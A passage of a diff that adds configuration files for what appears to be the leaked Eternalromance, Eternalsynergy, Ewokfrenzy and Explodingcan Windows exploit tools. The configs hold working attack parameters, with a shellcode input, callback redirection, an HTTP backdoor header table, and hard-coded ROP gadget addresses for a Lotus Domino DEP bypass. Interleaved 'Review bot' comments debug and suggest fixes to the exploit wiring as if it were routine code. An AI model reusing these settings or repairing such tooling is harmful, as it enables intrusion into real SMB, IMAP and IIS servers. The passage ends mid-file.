<os family="windows" name="Windows 2003" servicepack="2" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="W2K3SP2"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows XP" servicepack="1" architecture="x64 64-bit">
|
||||
<bindtovalue name="Target" value="W2K3XPX64SP1"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows XP" servicepack="2" architecture="x64 64-bit">
|
||||
<bindtovalue name="Target" value="W2K3XPX64SP2"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2003" servicepack="1" architecture="x64 64-bit">
|
||||
<bindtovalue name="Target" value="W2K3XPX64SP1"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2003" servicepack="2" architecture="x64 64-bit">
|
||||
<bindtovalue name="Target" value="W2K3XPX64SP2"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows Vista" servicepack="0" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows Vista" servicepack="1" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows Vista" servicepack="2" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2008" servicepack="0" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2008" servicepack="1" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2008" servicepack="2" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2008 R2" servicepack="0" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 7" servicepack="0" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
</or>
|
||||
</and>
|
||||
</logic>
|
||||
|
||||
</config>
|
BIN
windows/exploits/Eternalromance-1.4.0.exe
Normal file
BIN
windows/exploits/Eternalromance-1.4.0.exe
Normal file
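--- a/windows/exploits/Eternalromance-1.4.0.fb
+++ b/windows/exploits/Eternalromance-1.4.0.fb
@@ -0,0 +1,21 @@
+<?xml version="1.0"?>
+<t:config id="df1cc1973caa2c3e1bbe4d2e48ffd23e50e4e428"
+name="Eternalromance"
+version="1.4.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+<t:touchlist>
+<t:plugin name="Smbtouch"
+displayname="ETRO Vulnerability Touch"
+description="Check if Target is vulnerable to ETRO">
+<t:oparam name="Target" value="Target"/>
+<t:oparam name="TargetOsArchitecture" value="TargetOsArchitecture"/>
+<t:oparam name="PipeName" value="PipeName"/>
+<t:oparam name="ShareName" value="ShareName"/>
+<t:oparam name="Credentials" value="Credentials"/>
+<t:oparam name="Username" value="Username"/>
+<t:oparam name="Password" value="Password"/>
+<t:oparam name="NtlmHash" value="NtlmHash"/>
+</t:plugin>
+</t:touchlist>
+</t:config>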
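Review bot: The `Target` oparam passed through from Smbtouch here can only select a paramgroup if the touch emits the group names Eternalromance-1.4.0.xml declares (`XP_SP0SP1_X86`, `SERVER_2003_SP0`, `VISTA_SP0`, …), yet that file's own `<logic>` block binds `Target` to a different vocabulary (`XP`, `W2K3SP0`, `W2K3XPX64SP1`, `WVISTA_2008_7`) that matches none of its groups, so at least one producer of `Target` is mis-wired; the group names are what the exploit consumes, so the bindings should use those, e.g. `<bindtovalue name="Target" value="SERVER_2003_SP0"/>`. The .xml's `<inputparameters>` begin outside this view, so whether `ShareName`, `Credentials` and `NtlmHash` exist there under exactly these names cannot be confirmed from here; the sibling Eternalsynergy config in this commit spells its hash inputs `ntHash`/`lmHash`, so the `NtlmHash` mapping is worth checking against the ETRO config before relying on the touch to fill it. A one-line comment above the `<t:oparam>` list stating which side of `name`/`value` is the touch output and which is the exploit input would make such mismatches obvious on review.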
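--- a/windows/exploits/Eternalsynergy-1.0.1.0.xml
+++ b/windows/exploits/Eternalsynergy-1.0.1.0.xml
@@ -0,0 +1,185 @@
+<?xml version='1.0' encoding='utf-8'?>
+<config xmlns='urn:trch' name='Eternalsynergy' version='1.0.1' schemaversion='2.1.0' configversion='1.0.1.0' id='665a77d7870f1e8dc34048203dc820525c09bd23'>
+<inputparameters>
+<parameter type='S16' name='NetworkTimeout' description='Timeout for blocking network calls (in seconds). Use -1 for no timeout.'>
+<default>60</default>
+</parameter>
+<parameter type='IPv4' name='TargetIp' description='Target IP Address'/>
+<parameter type='TcpPort' name='TargetPort' description='Target TCP port'>
+<default>445</default>
+</parameter>
+<parameter hidden='true' type='U32' name='MaxLeakAttempts' description='Number of tries to exploit. Default 7'>
+<default>7</default>
+</parameter>
+<parameter hidden='true' type='U32' name='MaxExploitAttempts' description='Number of tries to exploit. Default 3'>
+<default>3</default>
+</parameter>
+<parameter type='U32' name='AttemptIndex' description='How many times ETSY has already been used against this target (0-7)'>
+<default>0</default>
+</parameter>
+<parameter type='Boolean' name='ManyCoreTarget' description='Boolean specifying if the target is assumed to have many (8 or more) cores, physical or virtual'>
+<default>0</default>
+</parameter>
+<parameter type='String' name='PipeName' description='The named pipe to use'>
+</parameter>
+<paramchoice name='ExploitMethod' description='Which exploit method to use'>
+<default>Default</default>
+<paramgroup name='Default' description='Use the best exploit method(s) for the target OS'>
+<parameter hidden='true' type='U32' name='ExploitMethodChoice' description=''>
+<default>0</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Matched-pairs' description='More reliable'>
+<parameter hidden='true' type='U32' name='ExploitMethodChoice' description=''>
+<default>1</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Classic-Synergy' description='Less reliable'>
+<parameter hidden='true' type='U32' name='ExploitMethodChoice' description=''>
+<default>2</default>
+</parameter>
+</paramgroup>
+</paramchoice>
+<parameter xdevmap='EXPLOIT_SHELLCODE' type='LocalFile' name='ShellcodeFile' description='DOPU (x64 version!) ONLY! Other shellcode will likely BSOD.'/>
+<paramchoice name='Credentials' description='Type of credentials to use'>
+<default>Anonymous</default>
+<paramgroup name='Anonymous' description='Anonymous (NULL session)'>
+<parameter hidden='true' type='U32' name='CredChoice' description=''>
+<default>0</default>
+</parameter>
+<parameter hidden='true' type='Buffer' name='Username' description=''>
+<default/>
+</parameter>
+<parameter hidden='true' type='Buffer' name='Password' description=''>
+<default/>
+</parameter>
+</paramgroup>
+<paramgroup name='Guest' description='Guest account'>
+<parameter hidden='true' type='U32' name='CredChoice' description=''>
+<default>2</default>
+</parameter>
+<parameter hidden='true' type='Buffer' name='Username' description=''>
+<default>Guest</default>
+</parameter>
+<parameter hidden='true' type='Buffer' name='Password' description=''>
+<default/>
+</parameter>
+</paramgroup>
+<paramgroup name='Blank' description='User account with no password set'>
+<parameter hidden='true' type='U32' name='CredChoice' description=''>
+<default>2</default>
+</parameter>
+<parameter type='Buffer' name='Username' description='Username entered as hex bytes (in unicode)'/>
+<parameter hidden='true' type='Buffer' name='Password' description=''>
+<default/>
+</parameter>
+</paramgroup>
+<paramgroup name='Password' description='User name and password'>
+<parameter hidden='true' type='U32' name='CredChoice' description=''>
+<default>3</default>
+</parameter>
+<parameter type='Buffer' name='Username' description='Username entered as hex bytes (in unicode)'/>
+<parameter type='Buffer' name='Password' description='Password entered as hex bytes (in unicode)'/>
+</paramgroup>
+<paramgroup name='NTLM' description='User name and NT and/or LM hash'>
+<parameter hidden='true' type='U32' name='CredChoice' description=''>
+<default>4</default>
+</parameter>
+<parameter type='Buffer' name='Username' description='Username entered as hex bytes (in unicode)'/>
+<parameter type='Buffer' name='ntHash' description='NT password hash (in hex), or blank to use LM hash'>
+<default/>
+</parameter>
+<parameter type='Buffer' name='lmHash' description='LM password hash (in hex), or blank to use NT hash'>
+<default/>
+</parameter>
+</paramgroup>
+</paramchoice>
+<paramchoice name='Protocol' description='SMB (default port 445) or NBT (default port 139)'>
+<default>SMB</default>
+<paramgroup name='SMB' description=''>
+<parameter hidden='true' type='Boolean' name='UsingNbt' description='Boolean stating to use Nbt or not'>
+<default>0</default>
+</parameter>
+</paramgroup>
+<paramgroup name='NBT' description=''>
+<parameter hidden='true' type='Boolean' name='UsingNbt' description='Boolean stating to use Nbt or not'>
+<default>1</default>
+</parameter>
+</paramgroup>
+</paramchoice>
+<paramchoice name='Target' description='Operating System, Service Pack, of target OS'>
+<paramgroup name='WIN8_SP0' description='Windows 8 Sp0, 64-bit'>
+<parameter hidden='true' type='U8' name='OsMajor' description='OS Major Version'>
+<default>6</default>
+</parameter>
+<parameter hidden='true' type='U8' name='OsMinor' description='OS Minor Version'>
+<default>2</default>
+</parameter>
+<parameter hidden='true' type='U8' name='OsServicePack' description='OS Service Pack Level'>
+<default>0</default>
+</parameter>
+</paramgroup>
+<paramgroup name='SERVER_2K12_SP0' description='Windows Server 2012 Sp0, 64-bit'>
+<parameter hidden='true' type='U8' name='OsMajor' description='OS Major Version'>
+<default>6</default>
+</parameter>
+<parameter hidden='true' type='U8' name='OsMinor' description='OS Minor Version'>
+<default>2</default>
+</parameter>
+<parameter hidden='true' type='U8' name='OsServicePack' description='OS Service Pack Level'>
+<default>0</default>
+</parameter>
+</paramgroup>
+</paramchoice>
+</inputparameters>
+<outputparameters>
+<parameter type='Buffer' name='TargetOsArchitecture' description='The architecture of the target operating system'/>
+</outputparameters>
+<errors>
+<errorcode name='ETSY_ERROR_NO_MEMORY' value='65' description='Out of memory'/>
+<errorcode name='ETSY_ERROR_INVALID_PIPE_CHOICE' value='66' description='Named pipe choice not supported'/>
+<errorcode name='ETSY_UNALIGNED_RPC_STRUCT' value='67' description='Unaligned data attempted to be sent over browser pipe'/>
+<errorcode name='ETSY_ERROR_PIPES_NOT_AVAILABLE' value='68' description='No pipes available to connect to'/>
+<errorcode name='ETSY_ERROR_WINSOCK_STARTUP' value='69' description='Winsock failed to start up'/>
+<errorcode name='ETSY_ERROR_PARAM_INIT' value='69' description='Error during parameter initialization'/>
+<errorcode name='ETSY_ERROR_TRANS_NOT_FOUND' value='70' description='Unable to find a Transaction struct with info leak'/>
+<errorcode name='ETSY_ERROR_TRANS_WRITE_OUT_OF_RANGE' value='71' description='Cannot write that far into Transaction, should have written more with WriteAndX'/>
+<errorcode name='ETSY_ERROR_TRANS_TAKEOVER_UNSUCCESSFUL' value='72' description='Memory written to was not a transaction we controlled'/>
+<errorcode name='ETSY_ERROR_OUT_OF_REMOTE_MEMORY' value='73' description='Out of memory to use in remote transaction'/>
+<errorcode name='ETSY_ERROR_UNKNOWN_TRANS_SIZE' value='74' description='Unknown transaction size detected'/>
+<errorcode name='ETSY_ERROR_NOT_ENOUGH_LEAK_DATA' value='75' description='Leak returned with less data than it should have'/>
+<errorcode name='ETSY_ERROR_STRUCT_WALK_ABORTED' value='76' description='Failed to walk structures and find Srv module'/>
+<errorcode name='ETSY_ERROR_BACKDOOR_NOT_PRESENT' value='77' description='Backdoor transaction sent but backdoor did not respond'/>
+<errorcode name='ETSY_ERROR_PAYLOAD_TOO_LARGE' value='78' description='Stage 1 payload exceeded max allowed size (0xFFFF)'/>
+<errorcode name='ETSY_ERROR_BACKDOOR_RETURNED_ERROR' value='79' description='Backdoor present but returned an error code'/>
+<errorcode name='ETSY_ERROR_BLUE_SCREENED_TARGET' value='80' description='Overwrite caused the target to blue screen'/>
+<errorcode name='ETSY_ERROR_OS_NOT_SUPPORTED' value='81' description='Offsets not available for the targeted OS'/>
+<errorcode name='ETSY_ERROR_DISPATCH_TABLE_NOT_FOUND' value='82' description='Unable to locate the dispatch table in memory'/>
+<errorcode name='ETSY_ERROR_EXPLOITATION_UNSUCCESSFUL' value='83' description='Exploit methods were tried and were not successful'/>
+<errorcode name='ETSY_ERROR_EXPLOIT_METHOD_UNSUCCESSFUL' value='84' description='Exploit method was not successful but did not crash, other methods may be tried'/>
+<errorcode name='ETSY_ERROR_INVALID_EXPLOIT_METHOD' value='85' description='Exploit method not possible for target OS'/>
+<errorcode name='ETSY_ERROR_TIPPYBEER' value='86' description='Tippybeer encountered an unrecoverable error, probably memory related'/>
+<errorcode name='ETSY_ERROR_CONNECTION_LOCAL' value='87' description='Something went wrong at the network layer on our end!'/>
+<errorcode name='ETSY_ERROR_CONNECTION_REMOTE' value='88' description='Connection to target failed'/>
+<errorcode name='ETSY_ERROR_ARCH' value='89' description='Architecture is unknown or not supported'/>
+</errors>
+<redirection>
+<local protocol='TCP' listenaddr='TargetIp' listenport='TargetPort' closeoncompletion='true' destaddr='TargetIp' destport='TargetPort'/>
+</redirection>
+<logic>
+<and>
+<service name='smb'>
+<bindtovalue name='Protocol' value='SMB'/>
+<bindtopath path="//service[name='smb']/port" name='TargetPort'/>
+</service>
+<or>
+<os servicepack='0' name='Windows 8' family='windows' architecture='x64 64-bit'>
+<bindtovalue name='Target' value='WIN8_SP0'/>
+</os>
+<os servicepack='0' name='Windows Server 2012' family='windows' architecture='x64 64-bit'>
+<bindtovalue name='Target' value='SERVER_2K12_SP0'/>
+</os>
+</or>
+</and>
+</logic>
+</config>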
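Review bot: `ETSY_ERROR_WINSOCK_STARTUP` and `ETSY_ERROR_PARAM_INIT` both declare `value='69'` in the `<errors>` table, so a status of 69 from the exploit cannot be attributed to either condition by whatever consumes this config; the other codes run contiguously 65–89, so one of the two needs its own value (e.g. `<errorcode name='ETSY_ERROR_PARAM_INIT' value='90' .../>`), but the binary and this table must agree, so confirm which value Eternalsynergy-1.0.1.exe actually returns before renumbering. `MaxLeakAttempts` carries the same description as `MaxExploitAttempts` (`Number of tries to exploit. Default 7`), which reads like a copy-paste; presumably it should say `Number of tries for the info leak. Default 7` — hedged, since the parameter is hidden and its use is only inferable from the name. The `Guest` and `Blank` credential groups both set `CredChoice` to 2 while Anonymous/Password/NTLM use 0/3/4; that may be deliberate (both are a username with an empty password), but a short comment such as `<!-- Guest and Blank share CredChoice 2: username with empty password -->` would stop the next editor from "fixing" it. `AttemptIndex` is documented as `(0-7)` with no range constraint visible in the file, and `TargetOsArchitecture` is typed `Buffer` here where the Eternalromance config in this same commit types it `String`; if the same touch plugin feeds both, the two types should be reconciled.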
BIN
windows/exploits/Eternalsynergy-1.0.1.exe
Normal file
BIN
windows/exploits/Eternalsynergy-1.0.1.exe
Normal file
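--- a/windows/exploits/Eternalsynergy-1.0.1.fb
+++ b/windows/exploits/Eternalsynergy-1.0.1.fb
@@ -0,0 +1,21 @@
+<?xml version="1.0"?>
+<t:config id="665a77d7870f1e8dc34048203dc820525c09bd23"
+name="Eternalsynergy"
+version="1.0.1"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+<t:touchlist>
+<t:plugin name="Smbtouch"
+displayname="ETSY Vulnerability Touch"
+description="Check if Target is vulnerable to ETSY">
+<t:oparam name="Target" value="Target"/>
+<t:oparam name="TargetOsArchitecture" value="TargetOsArchitecture"/>
+<t:oparam name="PipeName" value="PipeName"/>
+<t:oparam name="ShareName" value="ShareName"/>
+<t:oparam name="Credentials" value="Credentials"/>
+<t:oparam name="Username" value="Username"/>
+<t:oparam name="Password" value="Password"/>
+<t:oparam name="NtlmHash" value="NtlmHash"/>
+</t:plugin>
+</t:touchlist>
+</t:config>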
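Review bot: The `ShareName` and `NtlmHash` oparams wired from Smbtouch have no counterpart in Eternalsynergy-1.0.1.0.xml's `<inputparameters>` in this same commit: that file declares no `ShareName` parameter at all and spells its hash inputs `ntHash` and `lmHash` under the `NTLM` credential group, so unless the framework resolves names loosely the touch's hash result will never populate the exploit's parameter. Whichever side of `name`/`value` designates the exploit input should be changed to the declared names (e.g. `<t:oparam name="NtlmHash" value="ntHash"/>`) and the `ShareName` line either dropped or matched by a new input in the .xml. The `Target` mapping is consistent here, since the .xml's `<logic>` block binds `Target` to its own paramgroup names `WIN8_SP0` and `SERVER_2K12_SP0`, which is what a touch would have to emit. This stub is otherwise identical to Eternalromance-1.4.0.fb apart from the id and ETRO→ETSY text, which suggests the parameter list was copied without being checked against the ETSY config.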
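--- a/windows/exploits/Ewokfrenzy-2.0.0.0.fb
+++ b/windows/exploits/Ewokfrenzy-2.0.0.0.fb
@@ -0,0 +1,8 @@
+<?xml version="1.0"?>
+<t:config id="c6cbf455066b1dbf43c7c3332a50a273e986ec5c"
+name="Ewokfrenzy"
+version="2.0.0"
+configversion="2.0.0.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+</t:config>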
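--- a/windows/exploits/Ewokfrenzy-2.0.0.0.xml
+++ b/windows/exploits/Ewokfrenzy-2.0.0.0.xml
@@ -0,0 +1,105 @@
+<?xml version="1.0"?>
+<t:config id="c6cbf455066b1dbf43c7c3332a50a273e986ec5c"
+name="Ewokfrenzy"
+version="2.0.0"
+configversion="2.0.0.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+<t:inputparameters>
+
+<!-- Parameters for the target machine -->
+<t:parameter name="TargetIp" type="IPv4" description="Target IPv4 Address (dot notation)" />
+<t:parameter name="TargetPort" type="TcpPort" description="Target Port Number for IMAP service" />
+
+<!-- Parameters for the callback machine -->
+<t:parameter name="CallbackIp" type="IPv4" description="Callback IPv4 Address (dot notation)" />
+<t:parameter name="CallbackPort" type="TcpPort" description="Callback Port Number" default="0" />
+<t:parameter name="CallbackLocalPort" type="TcpPort" description="Callback Port Number" required="false" />
+<t:parameter name="NetworkTimeout" type="S16" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." default="60" />
+
+<t:paramchoice name="DominoVersion" description="The version of Lotus Domino running on the target">
+
+<!-- This is a template for the version-dependent input parameters
+<t:paramgroup name="7.0.2" description="">
+<t:parameter name="ReturnAddrOffset" description="Number of bytes between the start of the input buffer and the vulnerable return address" type="U32" value="0x22C" hidden="true" />
+<t:parameter name="AddrPopEax" description="Memory address satisfying the requirements for the PopEax routine" type="U32" value="0x0042A001" hidden="true" />
+<t:parameter name="AddrVirtualAlloc" description="Memory address whose contents point to the kernel32.VirtualAlloc routine" type="U32" value="0x0043305C" hidden="true" />
+<t:parameter name="AddrJmpEaxPtr" description="Memory address satisfying the requirements for the JmpEaxPtr routine" type="U32" value="0x0041D5A7" hidden="true" />
+<t:parameter name="AddrPopEdi" description="Memory address satisfying the requirements for the PopEdi routine" type="U32" value="0x0042CB58" hidden="true" />
+<t:parameter name="AddrEaxToEsi" description="Memory address satisfying the requirements for the EaxToEsi routine" type="U32" value="0x100AAADD" hidden="true" />
+<t:parameter name="AddrCopyCode" description="Memory address satisfying the requirements for the CopyCode routine" type="U32" value="0x60709A24" hidden="true" />
+<t:parameter name="AddrIncEax" description="Memory address satisfying the requirements for the IncEax routine" type="U32" value="0x600F8E54" hidden="true" />
+<t:parameter name="AddrJmpEax" description="Memory address satisfying the requirements for the JmpEax routine" type="U32" value="0x00429A6C" hidden="true" />
+
+<t:parameter name="AddrSetAtEdxRet" description="Memory address satisfying the requirements for the SetAtEdxRet routine" type="U32" value="0x004050A7" hidden="true" />
+<t:parameter name="AddrClrEaxRet" description="Memory address satisfying the requirements for the ClrEaxRet routine" type="U32" value="0x6001FAC1" hidden="true" />
+<t:parameter name="RetEip" description="Address of instruction to cleanly return execution to" type="U32" value="0x00413E78" hidden="true" />
+</t:paramgroup>
+-->
+
+<t:paramgroup name="6.5.4" description="">
+<!-- Return Addresses appearing in null-friendly buffer in conventional DEP defeat -->
+<t:parameter name="AddrPopEax" description="" type="U32" value="0x00428463" hidden="true" />
+<t:parameter name="AddrVirtualAlloc" description="" type="U32" value="0x0042E038" hidden="true" />
+<t:parameter name="AddrJmpEaxPtr" description="" type="U32" value="0x00420CF5" hidden="true" />
+<t:parameter name="AddrPopEdi" description="" type="U32" value="0x60132252" hidden="true" />
+<t:parameter name="AddrEaxToEsi" description="" type="U32" value="0x60951039" hidden="true" />
+<t:parameter name="AddrCopyCode" description="" type="U32" value="0x607112B4" hidden="true" />
+<t:parameter name="AddrIncEax" description="" type="U32" value="0x60168187" hidden="true" />
+<t:parameter name="AddrJmpEax" description="" type="U32" value="0x600A371D" hidden="true" />
+
+<!-- Return Addresses appearing in null-friendly buffer after conventional DEP defeat -->
+<t:parameter name="AddrSetAtEdxRet" description="" type="U32" value="0x609DBEA1" hidden="true" />
+<t:parameter name="AddrClrEaxRet" description="" type="U32" value="0x0042845E" hidden="true" />
+
+<t:parameter name="OffsetEsp2Buffer" description="" type="U32" value="0x000000BC" hidden="true" />
+<t:parameter name="OffsetEsp2Ebp" description="" type="U32" value="0x00000090" hidden="true" />
+<t:parameter name="CleanupOverflowed" description="" type="U32" value="0x60A528EC" hidden="true" />
+</t:paramgroup>
+
+<t:paramgroup name="7.0.2" description="">
+<!-- Return Addresses appearing in null-friendly buffer in conventional DEP defeat -->
+<t:parameter name="AddrPopEax" description="" type="U32" value="0x0042A001" hidden="true" />
+<t:parameter name="AddrVirtualAlloc" description="" type="U32" value="0x0043305C" hidden="true" />
+<t:parameter name="AddrJmpEaxPtr" description="" type="U32" value="0x0041D5A7" hidden="true" />
+<t:parameter name="AddrPopEdi" description="" type="U32" value="0x0042CB58" hidden="true" />
+<t:parameter name="AddrEaxToEsi" description="" type="U32" value="0x100AAADD" hidden="true" />
+<t:parameter name="AddrCopyCode" description="" type="U32" value="0x60709A24" hidden="true" />
+<t:parameter name="AddrIncEax" description="" type="U32" value="0x600F8E54" hidden="true" />
+<t:parameter name="AddrJmpEax" description="" type="U32" value="0x00429A6C" hidden="true" />
+
+<!-- Return Addresses appearing in null-friendly buffer after conventional DEP defeat -->
+<t:parameter name="AddrSetAtEdxRet" description="" type="U32" value="0x004050A7" hidden="true" />
+<t:parameter name="AddrClrEaxRet" description="" type="U32" value="0x6001FAC1" hidden="true" />
+
+<t:parameter name="OffsetEsp2Buffer" description="" type="U32" value="0x000000BC" hidden="true" />
+<t:parameter name="OffsetEsp2Ebp" description="" type="U32" value="0x00000090" hidden="true" />
+<t:parameter name="CleanupOverflowed" description="" type="U32" value="0x60B3FDF8" hidden="true" />
+</t:paramgroup>
+
+</t:paramchoice>
+
+</t:inputparameters>
+
+<t:outputparameters>
+<t:parameter name="Contract"
+description="The contract fulfilled by this plugin"
+type="String"
+value="StagedUpload"/>
+<t:parameter name="ConnectedTcp" type="Socket" description="the connected socket to the target following exploitation"/>
+<t:parameter name="XorMask" type="U8" description="the xor-mask set in the exploit for decoding the payload"/>
+</t:outputparameters>
+
+<t:redirection>
+<t:local protocol="TCP"
+listenaddr="TargetIp"
+listenport="TargetPort"
+destaddr="//identifier"
+destport="//service[name='imap']/port"
+closeoncompletion="true"/>
+<t:remote protocol="TCP"
+listenaddr="CallbackIp"
+listenport="CallbackPort"
+destport="CallbackLocalPort"/>
+</t:redirection>
+</t:config>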
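Review bot: `CallbackLocalPort` carries the same description as `CallbackPort` ("Callback Port Number") even though the `t:remote` redirection entry uses `CallbackPort` as `listenport` and `CallbackLocalPort` as `destport`, so the two prompts are indistinguishable to the operator; suggest `description="Local port the remote redirection delivers the callback to"`. `TargetPort` is described as the IMAP port but has no `default`, so a run without the `//service[name='imap']/port` binding from the redirection block prompts with nothing — `default="143"` would match the description if that is the intent, but confirm against the plugin. `DominoVersion` likewise has no `<default>`, which may be deliberate since the 6.5.4 and 7.0.2 gadget tables differ entirely, but a comment saying so would stop the next reader from adding one.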
BIN
windows/exploits/Ewokfrenzy-2.0.0.exe
Normal file
Binary file not shown.
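--- a/windows/exploits/Explodingcan-2.0.2.0.xml
+++ b/windows/exploits/Explodingcan-2.0.2.0.xml
@@ -0,0 +1,625 @@
+<?xml version='1.0' encoding='utf-8'?>
+<config xmlns='urn:trch' name='Explodingcan' version='2.0.2' schemaversion='2.1.0' configversion='2.0.2.0' id='9b6d2c7a836744e5cd54e4db262f09c67a5cae17'>
+<inputparameters>
+<paramchoice name='PayloadAccessType' description='Callback/Listen Payload Access'>
+<paramgroup name='Callback' description='Target connect() callback for payload upload connection'>
+<parameter type='IPv4' name='CallbackIp' description='Callback IP Address'/>
+<parameter type='TcpPort' name='CallbackPort' description='Callback port'/>
+<parameter type='TcpPort' name='CallbackLocalPort' description='Local callback port'/>
+</paramgroup>
+<paramgroup name='Listen' description='Target listen()/accept() for payload upload connection'>
+<parameter type='TcpPort' name='ListenPort' description='Listen port for shellcode to listen/accept on target'/>
+<parameter type='TcpPort' name='ListenLocalPort' description='Local listen por'/>
+<parameter type='U16' name='CallinTimeout' description='Sleep time before making callin to target'>
+<default>10</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Backdoor' description='Target open HTTP backdoor for payload upload connection'>
+<paramchoice name='BackdoorHeader' description='Name of HTTP header used to trigger backdoor.'>
+<default>If-Match</default>
+<paramgroup name='Accept' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>20</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Accept-Charset' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>21</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Accept-Encoding' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>22</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Accept-Language' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>23</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Allow' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>10</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Authorization' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>24</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Cache-Control' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>0</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Content-Encoding' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>13</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Content-Language' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>14</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Content-Location' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>15</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Content-MD5' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>16</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Content-Range' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>17</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Content-Type' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>12</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Cookie' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>25</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Date' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>2</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Expect' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>26</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Expires' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>18</default>
+</parameter>
+</paramgroup>
+<paramgroup name='From' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>27</default>
+</parameter>
+</paramgroup>
+<paramgroup name='If-Match' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>29</default>
+</parameter>
+</paramgroup>
+<paramgroup name='If-Modified-Since' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>30</default>
+</parameter>
+</paramgroup>
+<paramgroup name='If-None-Match' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>31</default>
+</parameter>
+</paramgroup>
+<paramgroup name='If-Range' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>32</default>
+</parameter>
+</paramgroup>
+<paramgroup name='If-Unmodified-Since' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>33</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Last-Modified' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>19</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Max-Forwards' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>34</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Pragma' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>4</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Proxy-Authorization' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>35</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Range' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>37</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Referer' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>36</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Trailer' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>5</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Translate' description=''>
+<parameter hidden='true' type='U32' name='BackdoorIndex' description=''>
+<default>39</default>
+</parameter>
+</paramgroup>
+<paramgroup name='Upgrade' description=''>
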